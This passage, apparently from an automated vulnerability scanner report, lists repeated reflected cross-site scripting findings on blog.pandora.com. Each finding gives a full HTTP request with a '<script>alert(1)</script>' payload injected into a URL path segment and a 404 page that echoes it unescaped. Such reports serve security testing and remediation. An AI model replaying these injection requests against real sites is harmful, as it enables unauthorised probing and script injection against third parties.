Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ was not found on this server.</p>
...[SNIP]...

3.249. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cc96<script>alert(1)</script>7c02a0cfd8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ was not found on this server.</p>
...[SNIP]...

3.250. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d407f<script>alert(1)</script>90eda7c143c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ was not found on this server.</p>
...[SNIP]...

3.251. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff848<script>alert(1)</script>e2df3910455 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ was not found on this server.</p>
...[SNIP]...

3.252. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edb24<script>alert(1)</script>4f85795b56c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ was not found on this server.</p>
...[SNIP]...

3.253. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d931d<script>alert(1)</script>e8c0ddecb85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ was not found on this server.</p>
...[SNIP]...

3.254. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b9c8<script>alert(1)</script>2807d91ee1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ was not found on this server.</p>
...[SNIP]...

3.255. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e09c9<script>alert(1)</script>d41b3d7ead was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ was not found on this server.</p>
...[SNIP]...

3.256. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6267<script>alert(1)</script>bcd7c444884 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ was not found on this server.</p>
...[SNIP]...

3.257. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c939<script>alert(1)</script>b06104d0963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...

3.258. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c4<script>alert(1)</script>474a0312c0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...

3.259. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa222<script>alert(1)</script>1c5a4ab29c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...

3.260. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79622<script>alert(1)</script>2b965e1ed52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...

3.261. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/08/be-part-of-a-pa.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39457<script>alert(1)</script>8f9246aff15 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 was not found on this server.</p>
...[SNIP]...

3.262. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92883<script>alert(1)</script>ae77c2b93bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ was not found on this server.</p>
...[SNIP]...

3.263. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0526<script>alert(1)</script>0f0e93964d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ was not found on this server.</p>
...[SNIP]...

3.264. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68e05<script>alert(1)</script>4497e666453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ was not found on this server.</p>
...[SNIP]...

3.265. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42f15<script>alert(1)</script>866bd41379a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

